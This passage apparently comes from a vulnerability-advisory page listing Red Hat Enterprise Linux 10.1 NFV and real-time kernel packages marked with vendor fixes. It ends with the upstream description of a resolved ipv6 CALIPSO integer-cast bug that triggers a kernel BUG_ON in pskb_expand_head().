fix
|
|
| Unresolved product id: NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
In the Linux kernel, the following vulnerability has been resolved: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() There exists a kernel oops caused by a BUG_ON(nhead < 0) at net/core/skbuff.c:2232 in pskb_expand_head(). This bug is triggered as part of the calipso_skbuff_setattr() routine when skb_cow() is passed headroom > INT_MAX (i.e. (int)(skb_headroom(skb) + len_delta) < 0). The root cause of the bug is due to an implicit integer cast in __skb_cow(). The check (headroom > skb_headroom(skb)) is meant to ensure that delta = headroom - skb_headroom(skb) is never negative, otherwise we will trigger a BUG_ON in pskb_expand_head(). However, if headroom > INT_MAX and delta <= -NET_SKB_PAD, the check passes, delta becomes negative, and pskb_expand_head() is passed a negative value for nhead. Fix the trigger condition in calipso_skbuff_setattr(). Avoid passing "negative" headroom sizes to 